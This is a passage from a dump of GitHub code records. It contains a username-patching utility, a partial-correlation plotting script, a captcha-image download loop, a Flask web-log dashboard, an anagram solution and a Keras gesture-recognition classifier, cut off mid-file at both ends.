{}\".format(text[match.end():match.end()+20]))\n trailer_start = match.end()\n trailer_end = trailer_start+1\n while text[trailer_end] != 0:\n trailer_end += 1\n headroom_end = trailer_end + 1\n while text[headroom_end] == 0:\n headroom_end += 1\n print(\"trailer {}, headroom {}\".format(text[trailer_start:trailer_end], headroom_end - trailer_end))\n \n sub_bytes = args.newuser.encode()\n if len(sub_bytes) > (match.end() - match.start()) + (headroom_end - trailer_end):\n print(\"ERROR: unable to fit new name {} in binary file\".format(args.user))\n sys.exit(1)\n trailer = text[trailer_start:trailer_end]\n cursor = match.start()\n text = bytearray(text)\n for b in sub_bytes:\n text[cursor] = b\n cursor += 1\n for b in trailer:\n text[cursor] = b\n cursor += 1\n for x in range(cursor, headroom_end):\n text[cursor] = 0\n cursor += 1\n file_changed = True\n wmode = 'wb'\n if file_changed:\n print(\"acting on file_changed {}\".format(path))\n os.rename(path, path+\".old\")\n with open(path, wmode) as fp:\n fp.write(text)\n\n \ndef run_main():\n args = ui()\n #args.pat = re.compile(r'/home/pgm/')\n args.pat = re.compile('({})'.format(args.olduser))\n args.bpat = re.compile(('(' + args.olduser + ')' ).encode())\n for ws in args.ws:\n fixup(args, ws)\n \n \n\n\n# execution starts here\n\nif __name__ == '__main__':\n run_main()","repo_name":"D-TACQ/acq400_hapi","sub_path":"user_apps/utils/fixup_css_ws.py","file_name":"fixup_css_ws.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"14439881795","text":"print(__doc__)\n# Compare the estiamted partial correlation with the ground truth\n# Figure 7\n\nfrom MyFunc import myglasso,mylasso,myelastic,myenetpath,mylassopath\nimport numpy as np\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.datasets import make_sparse_spd_matrix\n\n# load data\nX=np.genfromtxt('data/data.csv',delimiter=',')\ncov=np.genfromtxt('data/true_cov.csv',delimiter=',')\nprec=np.genfromtxt('data/true_prec.csv',delimiter=',')\n\nn_samples, n_features=X.shape\npart=np.zeros((n_features,n_features))\nfor i in range(n_features):\n for j in range(n_features):\n part[i,j]=-prec[i,j]/np.sqrt(prec[i,i]*prec[j,j])\n\n# Graphical lasso\nglam=np.array([0.4141])\ngpart,gprec,gcov=myglasso(X, lam=glam)\ngrmse=np.linalg.norm(gpart - part, ord='fro')\n\n# Lasso\nllam=np.array([0.5922])\nlpart,tor=mylasso(X,lam=llam)\nlrmse=np.linalg.norm(lpart - part, ord='fro')\n\n# Elastic Net\nelam=np.array([1.3368])\nealpha=np.array([0.2678])\nepart, tor=myelastic(X, lam=elam,alpha=ealpha)\nermse=np.linalg.norm(epart - part, ord='fro')\n\nprint('graphical lasso error: %f\\nlasso error: %f\\nelastic net error: %f' %(grmse,lrmse,ermse))\n\n# plot\nplt.figure(1)\nplt.subplots_adjust(left=0.02,right=0.98)\nvmax=np.maximum(part.max(),abs(part.min()))\nplt.subplot(1,4,1)\nplt.imshow(gpart, interpolation='nearest', vmin=-vmax, vmax=vmax, cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('Graphical Lasso, RSE=%f' % grmse)\nplt.subplot(1,4,2)\nplt.imshow(lpart,interpolation='nearest',vmin=-vmax,vmax=vmax,cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('Lasso Penalized, RSE=%f' % lrmse)\nplt.subplot(1,4,3)\nplt.imshow(epart,interpolation='nearest',vmin=-vmax,vmax=vmax,cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('Elastic Net Penalized, RSE=%f' % ermse)\nplt.subplot(1,4,4)\nplt.imshow(part,interpolation='nearest',vmin=-vmax,vmax=vmax,cmap=plt.cm.RdBu_r)\nplt.colorbar()\nplt.title('True Partial Correlation')\nplt.show()\n\nplt.figure(2)\nt=np.triu(np.ones((n_features,n_features)),1)\npart2=part[np.nonzero(t)]\ngpart2=gpart[np.nonzero(t)]\nlpart2=lpart[np.nonzero(t)]\nepart2=epart[np.nonzero(t)]\nplt.subplot(3,1,1)\nplt.plot(part2.flatten(),color='r',linestyle='--',label='True')\nplt.plot(gpart2.flatten(),color='b',label='Graphical lasso')\nplt.legend(prop={'size':10})\nplt.xlabel('locations')\nplt.ylabel('coefficient')\n\nplt.subplot(3,1,2)\nplt.plot(part2.flatten(),color='r',linestyle='--',label='True')\nplt.plot(lpart2.flatten(),label='Lasso')\nplt.legend(prop={'size':10})\nplt.xlabel('locations')\nplt.ylabel('coefficient')\n\nplt.subplot(3,1,3)\nplt.plot(part2.flatten(),color='r',linestyle='--',label='True')\nplt.plot(epart2.flatten(),label='Elastic Net')\nplt.legend(prop={'size':10})\nplt.xlabel('locations')\nplt.ylabel('coefficient')\n\nplt.show()","repo_name":"hcz28/partial_correlation","sub_path":"HResult.py","file_name":"HResult.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7074365964","text":"import os\nimport requests\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\n\ndef downloads_pic(pic_path, pic_name):\n url = 'https://www.jufaanli.com/home/Server/identitycode?0.7052675594065716'\n res = requests.get(url, stream=True)\n if not os.path.exists(pic_path):\n os.mkdir(pic_path)\n\n with open(os.path.join(pic_path, pic_name+'.gif'), 'wb') as f:\n for chunk in res.iter_content(chunk_size=1024):\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n f.flush()\n f.close()\n\n\nfor i in range(2445,10001 - 2444):\n downloads_pic('images', str(i))","repo_name":"liangtaohy/LotusSpider","sub_path":"captcha/jufaanli_captcha_pics.py","file_name":"jufaanli_captcha_pics.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"12748748735","text":"# TODO: Add expand modebar button to open the graph in a modal window\n\nimport base64\nimport os\nimport re\nimport time\nimport urllib.parse\nfrom copy import deepcopy\n\nimport pandas\nfrom flask import Blueprint, Flask, current_app, render_template\n\nfrom pyweblogalyzer.dataset.weblogdata import WebLogData\n\nappblueprint = Blueprint(\"dashboard\", __name__)\n\n\ndef hex_color_to_rgba(hex_color, opacity):\n \"\"\"Convert a color code string like '#123' or '#123456' to an rgba with opacity like 'rgba(12,34},56},0.2})'\"\"\"\n hex = hex_color.replace('#', '')\n\n if len(hex) == 3:\n hex = f\"${hex[0]}${hex[0]}${hex[1]}${hex[1]}${hex[2]}${hex[2]}\"\n\n r = int(hex[0:2], 16)\n g = int(hex[2:4], 16)\n b = int(hex[4:6], 16)\n return f\"rgba({r},{g},{b},{opacity / 100})\"\n\n\nclass DashboardApp(Flask):\n CONFIG_KEY_DASHBOARDS = \"DASHBOARDS_CONFIG\"\n CONFIG_KEY_BADGE_TITLE = \"badge_title\"\n CONFIG_KEY_BADGE_TYPE = \"badge_type\"\n CONFIG_KEY_TABLE_TITLE = \"table_title\"\n CONFIG_KEY_COUNT_TITLE = \"count_title\"\n CONFIG_KEY_TABLE_ORDER = \"table_order\"\n CONFIG_KEY_TABLE_HIDE = \"table_hide\"\n CONFIG_KEY_DISPLAY_COLS = \"display_cols\"\n CONFIG_KEY_GROUP_BY_COLS = \"group_by_cols\"\n CONFIG_KEY_CONTEXTUAL = \"contextual\"\n CONFIG_KEY_FILTER = \"filter\"\n CONFIG_KEY_ONCLICK = \"on_click\"\n CONFIG_KEY_LARGE = \"large\"\n CONFIG_KEY_TIME_GROUP = \"time_group\"\n CONFIG_KEY_TIME_TITLE = \"time_title\"\n CONFIG_KEY_GRAPH = \"graph_config\"\n CONFIG_KEY_ALLOW_EMPTY = \"allow_empty\"\n CONFIG_TEXT_RENDERER_REGEX = \"\\{\\{(?P[\\d\\s\\w]*)\\}\\}\"\n DEFAULT_GEO_MARKER_MAX_SIZE = 100\n DEFAULT_BADGE_TYPE = \"gray\"\n\n def __init__(self, dataset, config_class, config_env: None):\n super().__init__(__name__)\n self._dataset = dataset\n self.renderer_parser = re.compile(self.CONFIG_TEXT_RENDERER_REGEX)\n\n self.config.from_object(config_class)\n if config_env and os.environ.get(config_env):\n self.config.from_envvar(config_env)\n\n self.register_blueprint(appblueprint)\n\n def run(self):\n \"\"\"Start the web app.\"\"\"\n # Don't use the reloader as it restarts the app dynamically, creating a new collector\n super().run(host=self.config[\"HOST\"], port=self.config[\"PORT\"], debug=self.config[\"DEBUG\"], use_reloader=False)\n self.logger.info(\"Dashboard started, listening on port {self.config['PORT']}\")\n\n def get_dashboard_table_data(\n self,\n logdata,\n display_cols,\n groupby_cols=None,\n count_title=None,\n filter=None,\n value=None,\n time_group=None,\n time_title=None,\n allow_empty=False,\n ):\n \"\"\"Compute the data table for this dashboard.\"\"\"\n tabledata = logdata\n\n # Filter rows based on the value if specified\n if filter and value:\n # If the filter is not a valid column, check if it is period and the value a timestamp\n if filter not in tabledata.columns:\n try:\n start_time = pandas.Timestamp(value)\n time_delta = pandas.Timedelta(filter)\n tabledata = logdata.loc[start_time:start_time + time_delta]\n except ValueError:\n self.logger.warning(f\"Filter {filter} value {value} is not a column nor a time period, ignoring\")\n else:\n # Convert the value to int or float if it represents a number\n if value.isdigit():\n value = int(value)\n else:\n try:\n value = float(value)\n except ValueError:\n pass\n tabledata = tabledata[tabledata[filter] == value]\n\n # Filter out to keep specify columns\n if display_cols:\n # tabledata = tabledata[display_cols].dropna()\n tabledata = tabledata[display_cols]\n if not allow_empty:\n tabledata = tabledata.dropna()\n\n # If grouping specified, add a column with the duplicates count\n if groupby_cols:\n tabledata[count_title] = tabledata.groupby(groupby_cols)[groupby_cols[0]].transform('size')\n tabledata = tabledata.drop_duplicates(subset=groupby_cols)\n # Not really necessary as js will reorder re_index()\n tabledata.sort_values(by=count_title , axis=0, inplace=True, ignore_index=True, ascending=False)\n\n # If time grouping is specified\n if time_group:\n # Create a column with a unit to be summed up by period, and set the ts col to 1 to avoid it being removed\n tabledata[time_title] = 1\n tabledata['timestamp'] = 1\n tabledata = tabledata.groupby(pandas.Grouper(freq=time_group)).sum()\n # Update the timestamp column with a string version of the period time\n tabledata['timestamp'] = tabledata.index.strftime(WebLogData.DASHBOARD_TIMESTAMP_EXPORT_FORMAT)\n # tabledata['timestamp'] = tabledata.index.astype(numpy.int64) // 10 ** 6\n\n # print(f\"pipo {tabledata}\")\n return tabledata\n\n def _render_config(self, graph_config):\n \"\"\"Update the chart.js graph config to fill missing fields and replace labels and datasets.\n If the config is not valid; the graph will be ignored\n \"\"\"\n # DEFAULT_GRAPH_COLORS = [\n # \"#3e95cd\", \"#8e5ea2\", \"#3cba9f\", \"#e8c3b9\", \"#c45850\",\n # \"#F92672\", \"#FD971F\", \"#E69F66\", \"#E6DB74\", \"#A6E22E\",\n # \"#66D9EF\", \"#AE81FF\", \"#272822\", \"#F8F8F2\", \"#75715E\",\n # ]\n # DEFAULT_GRAPH_BG_COLORS = [hex_color_to_rgba(color, 40) for color in DEFAULT_GRAPH_COLORS]\n DEFAULT_OPTIONS = {\n 'data': {\n 'fill': 'tozeroy',\n 'line': {\n 'shape': 'spline',\n },\n },\n 'layout': {\n 'height': 250,\n 'automargin': True,\n 'autosize': True,\n 'margin': {'l': 60, 'r': 20, 't': 30, 'b': 65, 'pad': 4},\n 'plot_bgcolor': '#F5F5F5',\n 'paper_bgcolor': \"rgba(0,0,0,0)\",\n \"geo\": {\n \"scope\": 'world',\n \"showland\": True,\n \"landcolor\": 'rgb(217, 217, 217)',\n \"subunitwidth\": 1,\n \"countrywidth\": 1,\n \"subunitcolor\": 'rgb(255,255,255)',\n \"countrycolor\": 'rgb(255,255,255)',\n \"showcoastlines\": False,\n \"showocean\": True,\n # \"showrivers\": True,\n \"showcountries\": True,\n \"showsubunits\": True,\n \"subunitcolor\": 'rgb(255,255,255)',\n \"subunitwidth\": 1,\n \"showland\": True,\n \"resolution\": 50,\n \"showframe\": False,\n },\n },\n 'config': {\n 'scrollZoom': True,\n 'responsive': True,\n },\n }\n\n # Make sure to render a copy and not update the config\n rendered_config = deepcopy(graph_config)\n\n # Check required info are present\n for field in ['data', 'layout']:\n if field not in rendered_config:\n self.logger.warning(f\"Graph config missing required field {field}, graph ignored({rendered_config})\")\n return None\n\n # Fill missing config with defaults\n if 'config' not in rendered_config:\n rendered_config['config'] = DEFAULT_OPTIONS['config']\n else:\n for key in DEFAULT_OPTIONS['layout']:\n rendered_config['layout'].setdefault(key, DEFAULT_OPTIONS['layout'][key])\n\n # Fill default layout\n for key in DEFAULT_OPTIONS['layout']:\n rendered_config['layout'].setdefault(key, DEFAULT_OPTIONS['layout'][key])\n\n # Fill default dataset options and set empty label and data list\n for dataset in rendered_config['data']:\n for key in DEFAULT_OPTIONS['data']:\n for dataset in rendered_config['data']:\n dataset.setdefault(key, DEFAULT_OPTIONS['data'][key])\n for axis_key in self._get_dataset_axis_labels(dataset):\n rendered_config[axis_key] = []\n\n return rendered_config\n\n def _render_graph_text(self, text_template, tabledata):\n fields = self.renderer_parser.findall(text_template)\n labels = []\n for idx in range(len(tabledata)):\n txt = text_template\n for field in fields:\n txt = txt.replace(\"{{\" + field + \"}}\", str(tabledata[field][idx]))\n labels.append(txt)\n return labels\n\n def _get_dataset_axis_labels(self, dataset_config):\n \"\"\"Returns the key couple present in the dict.\"\"\"\n key_sets = [[\"x\", \"y\"], [\"values\", \"labels\"], [\"lat\", \"lon\"]]\n for keyset in key_sets:\n if all(key in dataset_config for key in keyset):\n return keyset\n self.logger.error(f\"No key found for graph axis data in {dataset_config.keys()}\")\n return []\n\n def _get_graph_dataset_columns(self, graph_config):\n \"\"\"Extract the xaxis column name, and the list of yaxis columnn names.\"\"\"\n try:\n xaxis = []\n yaxis = []\n for dataset in graph_config['data']['data']:\n xaxis.append(graph_config['data']['labels'])\n yaxis = [dataset['data'] for dataset in graph_config['data']['datasets']]\n return xaxis, yaxis\n except KeyError as e:\n self.log.warning(f\"Missing key {e} in graph config, ignoring graph data\")\n return None, None\n\n def _get_badge_id(self, dashboard_id):\n \"\"\"Build a badge id for this dashboard's badge.\"\"\"\n return f\"{dashboard_id}_badge\"\n\n def get_dashboard(self):\n \"\"\"Build the html dashboard page with no data.\"\"\"\n badges = {}\n dashboards = {}\n for db_id, db in self.config[self.CONFIG_KEY_DASHBOARDS].items():\n if not db.get(self.CONFIG_KEY_CONTEXTUAL, False):\n if db.get(self.CONFIG_KEY_BADGE_TITLE):\n badges[self._get_badge_id(db_id)] = {\n \"title\": db[self.CONFIG_KEY_BADGE_TITLE],\n \"type\": db.get(self.CONFIG_KEY_BADGE_TYPE, self.DEFAULT_BADGE_TYPE),\n }\n cols = deepcopy(db.get(self.CONFIG_KEY_DISPLAY_COLS, []))\n if db.get(self.CONFIG_KEY_COUNT_TITLE):\n cols.append(db[self.CONFIG_KEY_COUNT_TITLE])\n if db.get(self.CONFIG_KEY_TIME_TITLE):\n cols.append(db[self.CONFIG_KEY_TIME_TITLE])\n\n # If this db is large, but not at the beginning of a row, add an empty db\n if db.get(self.CONFIG_KEY_LARGE) and len(dashboards) % 2 != 0:\n dashboards[\"_empty_\"] = {\"title\": \"\"}\n\n dashboards[db_id] = {\n \"title\": db[self.CONFIG_KEY_TABLE_TITLE],\n \"columns\": cols,\n \"order\": db.get(self.CONFIG_KEY_TABLE_ORDER),\n \"hide\": db.get(self.CONFIG_KEY_TABLE_HIDE, []),\n }\n\n # If context db, add filter column\n ctxt_db = self.config[self.CONFIG_KEY_DASHBOARDS].get(db.get(self.CONFIG_KEY_ONCLICK))\n if ctxt_db:\n dashboards[db_id][\"ctxt_filter\"] = ctxt_db.get(self.CONFIG_KEY_FILTER)\n\n # Add graph data if specified\n graph_config = db.get(self.CONFIG_KEY_GRAPH)\n if graph_config:\n dashboards[db_id][\"graph_config\"] = self._render_config(graph_config)\n\n # If this db is large, add an invisible db to take the next slot\n if db.get(self.CONFIG_KEY_LARGE):\n dashboards[db_id][\"large\"] = True\n dashboards[\"_hidden_\"] = {\"title\": \"\"}\n\n return render_template('index.html', badges=badges, dashboards=dashboards, config=self.config)\n\n def get_dashboard_data(self):\n \"\"\"Get dashboard data to fill the html page.\"\"\"\n start_time = time.time()\n # Get the latest data\n logdata = self._dataset.get_dataframe()\n\n # Build a widget for each dashboard in the config\n display_data = []\n for dashboard_id, dashboard in self.config[self.CONFIG_KEY_DASHBOARDS].items():\n if not dashboard.get(self.CONFIG_KEY_CONTEXTUAL, False):\n db_data = {}\n tabledata = self.get_dashboard_table_data(\n logdata,\n display_cols=dashboard.get(self.CONFIG_KEY_DISPLAY_COLS, []),\n groupby_cols=dashboard.get(self.CONFIG_KEY_GROUP_BY_COLS),\n count_title=dashboard.get(self.CONFIG_KEY_COUNT_TITLE, \"count\"),\n time_group=dashboard.get(self.CONFIG_KEY_TIME_GROUP),\n time_title=dashboard.get(self.CONFIG_KEY_TIME_TITLE, \"tcount\"),\n allow_empty=dashboard.get(self.CONFIG_KEY_ALLOW_EMPTY, False)\n )\n\n # If this db has a badge\n if dashboard.get(self.CONFIG_KEY_BADGE_TITLE):\n db_data[\"badge_id\"] = self._get_badge_id(dashboard_id)\n db_data[\"badge_value\"] = len(tabledata)\n\n # Dashboard table data\n db_data[\"db_id\"] = dashboard_id\n db_data[\"table_data\"] = tabledata.values.tolist()\n\n graph_config = dashboard.get(self.CONFIG_KEY_GRAPH)\n if graph_config and 'layout' in graph_config:\n graph_data = {}\n for dataset in graph_config['data']:\n for key in self._get_dataset_axis_labels(dataset):\n graph_data.setdefault(key, [])\n graph_data[key].append(tabledata[dataset[key]].tolist())\n # For geo graphs, render text property\n if dataset.get(\"type\") == 'scattergeo':\n if 'text' in dataset:\n # Render the geo graph test to replace vars with column field values\n graph_data.setdefault('text', [])\n graph_data['text'].append(self._render_graph_text(dataset['text'], tabledata))\n if 'marker' in dataset:\n # If a marker size is specified as a string, replace it with the computed values\n size = dataset['marker'].get('size')\n if isinstance(size, str):\n graph_data.setdefault('marker', [])\n graph_data['marker'].append(self._render_marker_size(tabledata, dataset))\n\n db_data[\"graph_data\"] = graph_data\n display_data.append(db_data)\n\n page_data = {\n \"dashboards\": display_data,\n \"start_date\": logdata.index[0].strftime(self.config['DASHBOARD_RANGE_TIME_FORMAT']),\n \"end_date\": logdata.index[len(logdata) - 1].strftime(self.config['DASHBOARD_RANGE_TIME_FORMAT']),\n }\n\n self.logger.info(f\"Request exec time: {time.time()-start_time}\")\n return page_data\n\n def _render_marker_size(self, tabledata, dataset):\n marker_data = deepcopy(dataset['marker'])\n size = dataset['marker'].get('size')\n\n # Compute the dynamuc marker size between sizemin and sizemax\n # where sizemax is the biggest value in the table\n sizes = tabledata[size]\n maxsz = dataset['marker'].get('sizemax', self.DEFAULT_GEO_MARKER_MAX_SIZE)\n ratio = maxsz / max(sizes)\n marker_data[\"size\"] = [int(sizes[idx] * ratio) for idx in range(len(tabledata))]\n return marker_data\n\n def context_data(self, dashboard, key):\n parent_dashboard_config = self.config[self.CONFIG_KEY_DASHBOARDS].get(dashboard)\n ctxt_db = parent_dashboard_config.get(self.CONFIG_KEY_ONCLICK)\n # Only proceed further if a contextual dashboard is configured\n if ctxt_db:\n parent_time_group = parent_dashboard_config.get(self.CONFIG_KEY_TIME_GROUP)\n dashboard_config = self.config[self.CONFIG_KEY_DASHBOARDS].get(ctxt_db)\n\n # If the timestamp is the filter and the parent db is time grouped, filter by this time period\n filter = dashboard_config.get(self.CONFIG_KEY_FILTER)\n if parent_time_group and filter == \"timestamp\":\n filter = parent_time_group\n\n if dashboard_config:\n logdata = self._dataset.get_dataframe()\n tabledata = self.get_dashboard_table_data(\n logdata,\n display_cols=dashboard_config.get(self.CONFIG_KEY_DISPLAY_COLS, []),\n groupby_cols=dashboard_config.get(self.CONFIG_KEY_GROUP_BY_COLS),\n count_title=dashboard_config.get(self.CONFIG_KEY_COUNT_TITLE, \"count\"),\n filter=filter,\n value=key\n )\n title = dashboard_config[\"table_title\"].format(key)\n modal_data = {}\n modal_data[\"table_id\"] = \"db-modal-table\"\n modal_data[\"table_cols\"] = tabledata.columns.tolist()\n modal_data[\"table_data\"] = tabledata.values.tolist()\n modal_data[\"html\"] = render_template('modal.html', modal_data=modal_data, table_title=title)\n return modal_data\n else:\n self.logger.warning(f\"No dashboard {dashboard}, check the configuration\")\n return \"\"\n\n\n@appblueprint.route(\"/\", methods=[\"GET\"])\ndef get_index():\n return current_app.get_dashboard()\n\n\n@appblueprint.route(\"/data\", methods=[\"GET\"])\ndef get_data():\n return current_app.get_dashboard_data()\n\n\n@appblueprint.route(\"/context//\", methods=[\"GET\"])\ndef get_context_data(dashboard, key):\n # Declode parameters. dashboard is escaped, and key is base64 encoded\n decoded_dashboard = urllib.parse.unquote(dashboard)\n decoded_key = base64.b64decode(key.encode()).decode()\n return current_app.context_data(decoded_dashboard, decoded_key)\n","repo_name":"vche/pyweblogalyzer","sub_path":"src/pyweblogalyzer/dashboard/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36907810887","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nGiven two strings s and t , write a function to determine if t is an anagram of s.\n\nExample 1:\n\nInput: s = \"anagram\", t = \"nagaram\"\nOutput: true\nExample 2:\n\nInput: s = \"rat\", t = \"car\"\nOutput: false\nNote:\nYou may assume the string contains only lowercase alphabets.\n\nFollow up:\nWhat if the inputs contain unicode characters? How would you adapt your solution to such case?\n\"\"\"\n\n__mtime__ = '2018/12/8'\n\n\n# Run 36 ms\nclass Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n\n if len(s) != len(t):\n return False\n\n alphabets = [0] * 26\n ord_a = ord('a')\n for i, c in enumerate(s):\n pos = ord(c) - ord_a\n alphabets[pos] += 1\n pos = ord(t[i]) - ord_a\n alphabets[pos] -= 1\n\n for i in range(26):\n if alphabets[i] != 0:\n return False\n return True\n","repo_name":"lee2014/interview_code","sub_path":"leetcode/242_valid_anagram.py","file_name":"242_valid_anagram.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"41356142918","text":"import os, io, json\nimport numpy as np\nimport cv2\nimport keras\nimport time\nimport tensorflow as tf\nfrom tensorflow.python.keras.backend import set_session\nfrom tensorflow.python.keras.models import load_model\nfrom keras.models import Model\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\nclass Classifier:\n\tglobal model\n\tglobal graph\n\tglobal session\n\tsession = tf.Session(graph=tf.Graph())\n\n\tdata = {'videoName' : 'stream', 'segmentNumber' : 0, 'gestures' :[]}\n\tframes = []\n\tfps = 0\n\n\tlabels = []\n\twith open('labels.json') as jsonFile:\n\t\tdata = json.load(jsonFile)\n\t\tfor p in data['list']:\n\t\t\tlabels.append(p['name'])\n\n\tdef load(self):\n\t\ttry:\n\n\t\t\t#session = tf.Session(graph=tf.Graph().as_default())\n\t\t\twith session.graph.as_default():\n\t\t\t\tkeras.backend.set_session(session)\n\t\t\t\tself.model = load_model('Gesture-Recognition-with-3DRESNET/model/3D_RESNET_101_drop_0.5/model.best.hdf5')\n\n\t\t\t\tprint(\"Model successfully loaded from disk.\")\n\n\t\t\t#compile again\n\t\t\t\tself.model.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n\t\texcept:\n\t\t\tprint(\"Model not found\")\n\t\t\treturn None\n\n\n\tdef getFrames(self, videoName, segmentNumber):\n\t\tduration = 1\n\t\twith open('segmentFiles/' + str(videoName[0:videoName.index('.')]) + 'Segments.json') as json_file:\n\t\t\tdata = json.load(json_file)\n\t\t\tduration = float(data['videoDuration'])\n\t\t\tstart = float((data['segments'][segmentNumber])['start'])\n\t\t\tend = float((data['segments'][segmentNumber])['end'])\n\n\t\timg_rows,img_cols=96, 64\n\t\tvideoFrames = []\n\t\tvidcap = cv2.VideoCapture('videoFiles/' + str(videoName))\n\t\tsuccess,frame = vidcap.read()\n\n\t\tif not success:\n\t\t\tprint('could not load video')\n\t\twhile success:\n\t\t\tframe = cv2.flip(frame, 3)\n\t\t\tframe = cv2.resize(frame, (640,480))\n\n\t\t\timage=cv2.resize(frame,(img_rows,img_cols),interpolation=cv2.INTER_AREA)\n\t\t\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\tvideoFrames.append(gray)\n\t\t\tsuccess,frame = vidcap.read()\n\n\t\tself.fps = float(len(videoFrames) / duration)\n\t\tvideoFrames = videoFrames[int(self.fps*start):(int(self.fps*end) + 1)]\n\n\t\tratio = len(videoFrames) / 16\n\t\tindex = 0\n\t\tframes = []\n\t\tfor i in range(16):\n\t\t\tframes.append(videoFrames[int(index)])\n\t\t\tindex += ratio\n\n\t\treturn frames\n\n\tdef classify(self, videoName, mode, segmentNumber=0):\n\t\timg_rows,img_cols=96, 64\n\n\t\tif mode == 0:\n\t\t\tself.frames = self.getFrames(videoName, int(segmentNumber))\n\t\telse:\n\t\t\tframe = cv2.imread('streamFiles/' + videoName + '.jpeg')\n\t\t\tframe = cv2.flip(frame, 3)\n\t\t\tframe = cv2.resize(frame, (640,480))\n\n\t\t\timage=cv2.resize(frame,(img_rows,img_cols),interpolation=cv2.INTER_AREA)\n\t\t\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\t\t\tself.frames.append(gray)\n\t\t\tif len(self.frames) != 16:\n\t\t\t\treturn self.data\n\n\t\tinput=np.array(self.frames)\n\n\t\tself.frames = []\n\t\t# print(input.shape)\n\t\tX_tr = []\n\t\tX_tr.append(input)\n\t\tX_train= np.array(X_tr)\n\t\t# print(X_train.shape)\n\t\ttrain_set = np.zeros((1, 16, img_cols,img_rows,3))\n\t\ttrain_set[0][:][:][:][:]=X_train[0,:,:,:,:]\n\t\ttrain_set = train_set.astype('float32')\n\t\ttrain_set /=255\n\t\twith session.graph.as_default():\n\t\t\tkeras.backend.set_session(session)\n\t\t\tresult = self.model.predict(train_set)\n\t\tinput=[]\n\n\t\tif mode == 1:\n\t\t\tvideoName = 'stream'\n\n\t\tthreshold = 0\n\n\t\tself.data = {'videoName' : str(videoName), 'segmentNumber' : int(segmentNumber), 'gestures' :[]}\n\t\tfor i in range(len(result[0])):\n\t\t\tif result[0][i] > threshold:\n\t\t\t\tself.data['gestures'].append({'name': self.labels[i], 'probability': int(result[0][i]*100)})\n\n\t\tif mode == 0:\n\t\t\tself.saveResult(self.data, segmentNumber)\n\n\t\treturn self.data\n\n\tdef saveResult(self, data, segmentNumber):\n\t\tvideoName = data['videoName']\n\t\twith io.open('resultFiles/' + str(videoName[0:videoName.index('.')]) + 'Segment' + segmentNumber + 'Result.json', 'w') as outfile:\n\t\t\tjson.dump(data, outfile)\n\n\tdef getFramesSegmenting(self, videoName, duration):\n\t\timg_rows,img_cols=96, 64\n\t\tframes = []\n\t\tvidcap = cv2.VideoCapture('videoFiles/' + str(videoName))\n\t\tsuccess,frame = vidcap.read()\n\n\t\tif not success:\n\t\t\tprint('could not load video')\n\t\twhile success:\n\t\t\tframe = cv2.flip(frame, 3)\n\t\t\tframe = cv2.resize(frame, (640,480))\n\n\t\t\timage=cv2.resize(frame,(img_rows,img_cols),interpolation=cv2.INTER_AREA)\n\t\t\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\tframes.append(gray)\n\t\t\tsuccess,frame = vidcap.read()\n\n\t\tself.fps = float(len(frames) / duration)\n\n\t\treturn frames\n\n\tdef segment(self, videoName, duration):\n\t\timg_rows,img_cols=96, 64\n\n\t\tallFrames = self.getFramesSegmenting(videoName, float(duration))\n\n\t\tvalues = np.zeros(len(allFrames))\n\t\tvaluesCounter = np.zeros(len(allFrames))\n\n\t\tfor i in range(len(allFrames)-15):\n\t\t\tself.frames = allFrames[i:i+16]\n\n\t\t\tinput=np.array(self.frames)\n\n\t\t\tself.frames = []\n\t\t\t# print(input.shape)\n\t\t\tX_tr = []\n\t\t\tX_tr.append(input)\n\t\t\tX_train= np.array(X_tr)\n\t\t\t# print(X_train.shape)\n\t\t\ttrain_set = np.zeros((1, 16, img_cols,img_rows,3))\n\t\t\ttrain_set[0][:][:][:][:]=X_train[0,:,:,:,:]\n\t\t\ttrain_set = train_set.astype('float32')\n\t\t\ttrain_set /=255\n\t\t\twith self.graph.as_default():\n\t\t\t\tresult = self.model.predict(train_set)\n\t\t\t\tinput=[]\n\n\t\t\tvalues[i:i+16] += result[0][25]*100\n\t\t\tvaluesCounter[i:i+16] += 1\n\n\t\tdata = {'videoName' : str(videoName), 'videoDuration' : float(duration), 'segments' :[]}\n\n\t\tinSegment = False\n\t\tthreshold = 40\n\t\tstart = 0\n\t\tend = 0\n\t\tfor i in range(len(values)):\n\t\t\tvalues[i] /= valuesCounter[i]\n\t\t\tif i == (len(values) - 1):\n\t\t\t\tif inSegment:\n\t\t\t\t\tend = (i-1) / self.fps\n\t\t\t\t\tdata['segments'].append({'start': start, 'end': end})\n\t\t\t\tbreak\n\t\t\tif not inSegment:\n\t\t\t\tif values[i] <= threshold:\n\t\t\t\t\tinSegment = True\n\t\t\t\t\tstart = i / self.fps\n\t\t\telse:\n\t\t\t\tif values[i] > threshold:\n\t\t\t\t\tinSegment = False\n\t\t\t\t\tend = (i-1) / self.fps\n\t\t\t\t\tdata['segments'].append({'start': start, 'end': end})\n\n\t\tif len(data['segments']) == 0:\n\t\t\tdata['segments'].append({'start': 0, 'end': 